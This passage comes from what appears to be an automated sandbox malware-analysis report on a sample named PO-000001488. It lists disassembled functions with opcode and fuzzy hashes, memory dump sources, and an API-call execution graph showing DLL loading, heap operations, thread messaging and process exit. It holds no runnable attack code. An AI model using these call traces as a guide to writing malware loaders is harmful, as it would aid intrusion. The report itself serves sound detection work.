                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 628700d3e6a254313a70e597d42d1f04d5f4571eebd732ea46d4f85e490e5673
                                                      • Instruction ID: 270960fa0dd9dce7af0b6d4f357914785410567f91331eec2991ec04cb9ad91f
                                                      • Opcode Fuzzy Hash: 628700d3e6a254313a70e597d42d1f04d5f4571eebd732ea46d4f85e490e5673
                                                      • Instruction Fuzzy Hash: 4721F1756043049FDB15DF54D884B16FBB5FBC4A14F60C969D8490F246D33AD406CA61
                                                      Function 0153D006 Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601425153.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_153d000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7ffdb3b584fecd27a4652ad8a2d29a37a9cf509c79b2bbd41749459b9db2e450
                                                      • Instruction ID: da6ce995946b3e44d159b1bb3febbc56b2eff032f3ab7f48fb1282498d1622c9
                                                      • Opcode Fuzzy Hash: 7ffdb3b584fecd27a4652ad8a2d29a37a9cf509c79b2bbd41749459b9db2e450
                                                      • Instruction Fuzzy Hash: 902180755093808FCB02CF64D990715FF71FB86214F28C5DAD8498F2A7C33A980ACB62
                                                      Function 0152D1F7 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601350882.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_152d000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac1a99fa3094d31d6b273ac7c7f03b519f34febd85b0dbf2f78a0125c4c0676e
                                                      • Instruction ID: c135ad3ed64056f0ccd657e68338788d7f285576b543d71b4f4932159256bdaf
                                                      • Opcode Fuzzy Hash: ac1a99fa3094d31d6b273ac7c7f03b519f34febd85b0dbf2f78a0125c4c0676e
                                                      • Instruction Fuzzy Hash: EB21CD76504240CFCB06CF44D9C4B1ABF72FB85320F24C1A9DC080A296C33AD426CBA1
                                                      Function 0152D4BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601350882.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_152d000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                      • Instruction ID: f7a13bda6662fb21bac17c991cc38f4a94b9a035a05e046f4782220609be6c3f
                                                      • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                      • Instruction Fuzzy Hash: F311CD76604280CFCB02CF54D5C0B1ABF72FB84224F24C6A9D8490B296C33AD456CBA1
                                                      Function 0153D1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601425153.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_153d000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                      • Instruction ID: a13a79a3de0176f6131a4056d034b49b31a54b5e2d5d7d358e5f979ec38d6ece
                                                      • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                      • Instruction Fuzzy Hash: FB11BB75504280DFCB02CF54C5C0B19BBB2FB84224F24C6ADE8494F297C33AD40ACB61
                                                      Function 0152D731 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601350882.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_152d000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13ed69363eedb7fbaf931612726d9f432c6c262d14f96e4c8e2bd225b3b6de1f
                                                      • Instruction ID: 9375ec3c439d731f2d30e007a09459b685032022b3c82d09f2066f5f46257ae2
                                                      • Opcode Fuzzy Hash: 13ed69363eedb7fbaf931612726d9f432c6c262d14f96e4c8e2bd225b3b6de1f
                                                      • Instruction Fuzzy Hash: 1C0184725043949AE7105A65CDC476ABFE8FB86625F18C519ED494E1C2C27D9840C6B2
                                                      Function 0152D730 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601350882.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_152d000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac3e75a6aff4059e71bd2d6e424d3c7ffb02b7a17bab3d36dccceb07c5239768
                                                      • Instruction ID: 73f9908789cb338379087830791721b19c49545959de59d33a73ec832187f848
                                                      • Opcode Fuzzy Hash: ac3e75a6aff4059e71bd2d6e424d3c7ffb02b7a17bab3d36dccceb07c5239768
                                                      • Instruction Fuzzy Hash: CAF0C2320043849EE7108A19C8C4B66FFE8EB85634F18C55AEE084E2C2C27DA844CAB1

                                                      Non-executed Functions

                                                      Function 0158D5DC Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1601647700.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1580000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ca413a9bdee7486eb258601331c4bde0a53289d63d92ea7189ba0fb1917c5947
                                                      • Instruction ID: 4d329fe0ebc8e99ad585a9a990730f1f6fc030380e745bea0ab63350a365ee75
                                                      • Opcode Fuzzy Hash: ca413a9bdee7486eb258601331c4bde0a53289d63d92ea7189ba0fb1917c5947
                                                      • Instruction Fuzzy Hash: 52A16236E002168FCF15EFB5C84059EBBB2FF89304B15856AE902BF265DB71E956CB40

                                                      Execution Graph

                                                      Execution Coverage:1.2%
                                                      Dynamic/Decrypted Code Coverage:5%
                                                      Signature Coverage:9.3%
                                                      Total number of Nodes:140
                                                      Total number of Limit Nodes:9
                                                      execution_graph 93802 42f543 93803 42f553 93802->93803 93804 42f559 93802->93804 93807 42e463 93804->93807 93806 42f57f 93810 42c5a3 93807->93810 93809 42e47e 93809->93806 93811 42c5bd 93810->93811 93812 42c5ce RtlAllocateHeap 93811->93812 93812->93809 93827 424613 93828 42462f 93827->93828 93829 424657 93828->93829 93830 42466b 93828->93830 93831 42c283 NtClose 93829->93831 93837 42c283 93830->93837 93833 424660 93831->93833 93834 424674 93840 42e4a3 RtlAllocateHeap 93834->93840 93836 42467f 93838 42c2a0 93837->93838 93839 42c2b1 NtClose 93838->93839 93839->93834 93840->93836 93845 4249a3 93850 4249bc 93845->93850 93846 424a4c 93847 424a04 93853 42e383 93847->93853 93850->93846 93850->93847 93851 424a47 93850->93851 93852 42e383 RtlFreeHeap 93851->93852 93852->93846 93856 42c5f3 93853->93856 93855 424a14 93857 42c610 93856->93857 93858 42c621 RtlFreeHeap 93857->93858 93858->93855 93965 42f673 93966 42f5e3 93965->93966 93967 42f640 93966->93967 93968 42e463 RtlAllocateHeap 93966->93968 93969 42f61d 93968->93969 93970 42e383 RtlFreeHeap 93969->93970 93970->93967 93971 1512b60 LdrInitializeThunk 93972 42b873 93973 42b88d 93972->93973 93976 1512df0 LdrInitializeThunk 93973->93976 93974 42b8b5 93976->93974 93813 413bc3 93814 413bdd 93813->93814 93819 4173a3 93814->93819 93816 413bfb 93817 413c40 93816->93817 93818 413c2f PostThreadMessageW 93816->93818 93818->93817 93820 4173c7 93819->93820 93821 4173ce 93820->93821 93822 4173ed 93820->93822 93826 42f923 LdrLoadDll 93820->93826 93821->93816 93824 417403 LdrLoadDll 93822->93824 93825 41741a 93822->93825 93824->93825 93825->93816 93826->93822 93841 41af13 93842 41af57 93841->93842 93843 42c283 NtClose 93842->93843 93844 41af78 93842->93844 93843->93844 93859 4115e3 93860 4115f8 93859->93860 93865 4138d3 93860->93865 93863 42c283 NtClose 93864 411611 93863->93864 93866 4138f9 93865->93866 93868 411604 93866->93868 93869 413653 LdrInitializeThunk 93866->93869 93868->93863 93869->93868 93870 418968 93871 42c283 NtClose 93870->93871 93872 418972 93871->93872 93873 413768 93876 41366d 93873->93876 93874 413675 93876->93874 93877 42c503 93876->93877 93878 42c520 93877->93878 93881 1512c70 LdrInitializeThunk 93878->93881 93879 42c548 93879->93874 93881->93879 93882 401aec 93883 401aed 93882->93883 93886 42fa13 93883->93886 93884 401b5c 93884->93884 93889 42df33 93886->93889 93890 42df59 93889->93890 93901 4072f3 93890->93901 93892 42df6f 93900 42dfcb 93892->93900 93904 41ad23 93892->93904 93894 42df8e 93895 42dfa3 93894->93895 93919 42c643 93894->93919 93915 427f43 93895->93915 93898 42dfbd 93899 42c643 ExitProcess 93898->93899 93899->93900 93900->93884 93922 416053 93901->93922 93903 407300 93903->93892 93905 41ad4f 93904->93905 93940 41ac13 93905->93940 93908 41ad94 93910 41adb0 93908->93910 93913 42c283 NtClose 93908->93913 93909 41ad7c 93911 41ad87 93909->93911 93912 42c283 NtClose 93909->93912 93910->93894 93911->93894 93912->93911 93914 41ada6 93913->93914 93914->93894 93916 427fa4 93915->93916 93918 427fb1 93916->93918 93951 418213 93916->93951 93918->93898 93920 42c65d 93919->93920 93921 42c66e ExitProcess 93920->93921 93921->93895 93923 416070 93922->93923 93925 416089 93923->93925 93926 42cd03 93923->93926 93925->93903 93928 42cd1d 93926->93928 93927 42cd4c 93927->93925 93928->93927 93933 42b8c3 93928->93933 93931 42e383 RtlFreeHeap 93932 42cdc5 93931->93932 93932->93925 93934 42b8e0 93933->93934 93937 1512c0a 93934->93937 93935 42b90c 93935->93931 93938 1512c11 93937->93938 93939 1512c1f LdrInitializeThunk 93937->93939 93938->93935 93939->93935 93941 41ac2d 93940->93941 93945 41ad09 93940->93945 93946 42b963 93941->93946 93944 42c283 NtClose 93944->93945 93945->93908 93945->93909 93947 42b97d 93946->93947 93950 15135c0 LdrInitializeThunk 93947->93950 93948 41acfd 93948->93944 93950->93948 93953 41823d 93951->93953 93952 41874b 93952->93918 93953->93952 93959 413833 93953->93959 93955 41836a 93955->93952 93956 42e383 RtlFreeHeap 93955->93956 93957 418382 93956->93957 93957->93952 93958 42c643 ExitProcess 93957->93958 93958->93952 93963 413853 93959->93963 93961 4138bc 93961->93955 93962 4138b2 93962->93955 93963->93961 93964 41b033 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 93963->93964 93964->93962

                                                      Executed Functions

                                                      Function 004173A3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 334 4173a3-4173cc call 42f083 337 4173d2-4173e0 call 42f683 334->337 338 4173ce-4173d1 334->338 341 4173f0-417401 call 42da03 337->341 342 4173e2-4173ed call 42f923 337->342 347 417403-417417 LdrLoadDll 341->347 348 41741a-41741d 341->348 342->341 347->348
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417415
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                      • Instruction ID: 803bad41f6ba97ca028c5b6ebb90ab713b5e5efc40e90978f485b4949f8331b9
                                                      • Opcode Fuzzy Hash: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                      • Instruction Fuzzy Hash: 7E015EB1E0420DBBDB10DAE5DC42FDEB7B89B54308F4081AAED0897241F634EB588B95
                                                      Function 0042C283 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 354 42c283-42c2bf call 404673 call 42d4f3 NtClose
                                                      APIs
                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C2BA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                      • Instruction ID: 3acc76f724e085259d6ac582d8d2a4bb54828ea73bc7891a87a57e5bec1fb20c
                                                      • Opcode Fuzzy Hash: a3b23e781c8297b53f8e4474b48c3a032b94d0ec253a5db592d64cd3afe2f326
                                                      • Instruction Fuzzy Hash: 85E04F726002147BD620BA5ADC41F97776CDBC6714F00441AFB0867241C6B5B91187F8
                                                      Function 01512B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 368 1512b60-1512b6c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e387755376a784b68fdc7a6ea670e5b6dc14e94db05f839ef27a5f08da7a75d4
                                                      • Instruction ID: 49507d41a2c41417013409a2b8a43c7e2630286e3e28e15953ecad8202877881
                                                      • Opcode Fuzzy Hash: e387755376a784b68fdc7a6ea670e5b6dc14e94db05f839ef27a5f08da7a75d4
                                                      • Instruction Fuzzy Hash: 4490026320241003410571984415616408AA7E1211B59C421E1014994DCA6589916225
                                                      Function 01512DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 370 1512df0-1512dfc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4d4f2e63c09b76b3fecae46bd644940179ec32dc42b9a9070fe70391bab6b7c5
                                                      • Instruction ID: d0e498f4c4ed81dab651dbdcd76e70d8c6c27462aae41ed5873ea9d73c9e549b
                                                      • Opcode Fuzzy Hash: 4d4f2e63c09b76b3fecae46bd644940179ec32dc42b9a9070fe70391bab6b7c5
                                                      • Instruction Fuzzy Hash: 6190023320141413D111719845057070089A7D1251F99C812E042495CDDB968A52A221
                                                      Function 01512C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 369 1512c70-1512c7c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 58fef2394b12cbdb2de877cc1da80abace641805ab6a15542c8f1b140ac7e306
                                                      • Instruction ID: 5d50df8cbbee2b2bda7aba468b2dc41503c7f9fb2553242b7c26a2e61193905f
                                                      • Opcode Fuzzy Hash: 58fef2394b12cbdb2de877cc1da80abace641805ab6a15542c8f1b140ac7e306
                                                      • Instruction Fuzzy Hash: 1A90023320149802D1107198840574A0085A7D1311F5DC811E4424A5CDCBD589917221
                                                      Function 015135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f68158959e1618102f68221b5d6e42e58eb3dfc90dea200d8e2e4ced8788f920
                                                      • Instruction ID: a99eb259b985fbca9ff4af18ac9811caae9022af6ffa0c0908f25582513d86bf
                                                      • Opcode Fuzzy Hash: f68158959e1618102f68221b5d6e42e58eb3dfc90dea200d8e2e4ced8788f920
                                                      • Instruction Fuzzy Hash: 7B90023360551402D100719845157061085A7D1211F69C811E042496CDCBD58A5166A2
                                                      Function 00413BB5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00413C3A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: A34E618M$A34E618M
                                                      • API String ID: 1836367815-3667986552
                                                      • Opcode ID: 2be3bde86cb4d7dc141b6718e50ad7abfcbd0697461a34f352c73eabc8257f93
                                                      • Instruction ID: caa814e2df3becae4ab4015d96a0cbe41516eb01af2a68c1dd571b52ff96d7f3
                                                      • Opcode Fuzzy Hash: 2be3bde86cb4d7dc141b6718e50ad7abfcbd0697461a34f352c73eabc8257f93
                                                      • Instruction Fuzzy Hash: 7511C2B2D4015C7ADB11ABA18C81DEF7B7C9F41699F05805AFA14B7241D53C4F068BA1
                                                      Function 00413BC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00413C3A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: A34E618M$A34E618M
                                                      • API String ID: 1836367815-3667986552
                                                      • Opcode ID: 50c0b2199c71ebbef95a5cef98d5e0949c9d8ec523ae68ee7b4cf668f2c2b938
                                                      • Instruction ID: 92fdb82655a1d6a93dd9e1cc92e3bd6cbf280ac3eb93290fd97ea26f9d369f8b
                                                      • Opcode Fuzzy Hash: 50c0b2199c71ebbef95a5cef98d5e0949c9d8ec523ae68ee7b4cf668f2c2b938
                                                      • Instruction Fuzzy Hash: 3101C472D0011CBADB10AAE69C82DEFBB7CDF41798F058069FA14B7241E57C4F068BA5
                                                      Function 0042C5F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 160 42c5f3-42c637 call 404673 call 42d4f3 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C632
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: `A
                                                      • API String ID: 3298025750-2149027389
                                                      • Opcode ID: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                      • Instruction ID: ef4f435ce52e82b347afb479fc27a960a2fd8fe731e4cd794d162683faa6edbf
                                                      • Opcode Fuzzy Hash: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                      • Instruction Fuzzy Hash: A1E092B1204204BBC614EE99EC45FAB37ACEFC5714F00441AFA09A7241D7B9B91087B8
                                                      Function 00417423 Relevance: 1.7, APIs: 1, Instructions: 158libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 305 417423-41743a 306 417440-41744a 305->306 307 4173f6-417401 306->307 308 41744c-41747f 306->308 309 417403-417417 LdrLoadDll 307->309 310 41741a-41741d 307->310 308->306 313 417481-4174ac 308->313 309->310 314 417512-417513 313->314 315 4174ae-4174c3 313->315 317 417501 315->317 318 4174c5-4174ce 315->318 319 4174d1-417500 318->319 320 41750e 318->320 319->317 322 417510 320->322 323 417514-41752b call 42f0e3 320->323 322->314 326 41752d-41755e call 42f0e3 call 42b263 323->326 327 41755f-41757f call 42b263 323->327
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417415
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                      • Instruction ID: 2bdc795f987955a10cd13a1914c58911e0966c6eebcaf474662c92624490cd5e
                                                      • Opcode Fuzzy Hash: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                      • Instruction Fuzzy Hash: 85419C31A08345ABDB11DBB8DC81BEABBB8DF06758F0406EFFD448B142E6369545CB91
                                                      Function 0042C5A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 349 42c5a3-42c5e4 call 404673 call 42d4f3 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041E1BE,?,?,00000000,?,0041E1BE,?,?,?), ref: 0042C5DF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                      • Instruction ID: 369c668a4cc3a630eb3a9f8dc206576169b1919bd89476b6c8e575149a96f991
                                                      • Opcode Fuzzy Hash: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                      • Instruction Fuzzy Hash: 40E06DB2604214BBD614EF59EC85F9B73ACEFC9714F004419FA08A7241E675B91087B8
                                                      Function 0042C643 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 359 42c643-42c67c call 404673 call 42d4f3 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,6104CAEF,?,?,6104CAEF), ref: 0042C677
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_PO-000001488.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: d07bb6d48f55c1af12db6d259e200f4b880b1beeb5d75b6632a6234d11049001
                                                      • Instruction ID: 55c01a96584f11098ac7db8d9c475956f6f860f285eb3010744f92bad983cb5b
                                                      • Opcode Fuzzy Hash: d07bb6d48f55c1af12db6d259e200f4b880b1beeb5d75b6632a6234d11049001
                                                      • Instruction Fuzzy Hash: F5E086312002547BD610FA5AEC41FEB775CDFC6714F40441AFA08A7282D675BA0187F4
                                                      Function 01512C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 364 1512c0a-1512c0f 365 1512c11-1512c18 364->365 366 1512c1f-1512c26 LdrInitializeThunk 364->366
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 73a7da0b9726624f05570fd9b0dffb3a7524c8ec29f26215bfac411abd1eec90
                                                      • Instruction ID: 5c3d6b71e6925bc8e1553948165ea8800bf553775c93212eb37b81c4e41e2c7b
                                                      • Opcode Fuzzy Hash: 73a7da0b9726624f05570fd9b0dffb3a7524c8ec29f26215bfac411abd1eec90
                                                      • Instruction Fuzzy Hash: DAB09B739015D5D6EA12E7A4460971B794077D1715F29C461D3030A45F4778C1D1E275

                                                      Non-executed Functions

                                                      Function 01552349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2160512332
                                                      • Opcode ID: 4435f38c0a41c2b897add365439d9e0bd15f21fce532626e45f687fdf967654f
                                                      • Instruction ID: 2b4d3c7abe67a87184204e65ecb610cb21cbc106c77bf539cb21be563db15a04
                                                      • Opcode Fuzzy Hash: 4435f38c0a41c2b897add365439d9e0bd15f21fce532626e45f687fdf967654f
                                                      • Instruction Fuzzy Hash: 1A928E71608342EFE761CF29C890B6BB7E8BB84754F14481EFA95DB261D770E844CB92
                                                      Function 01508620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015454CE
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01545543
                                                      • Critical section address, xrefs: 01545425, 015454BC, 01545534
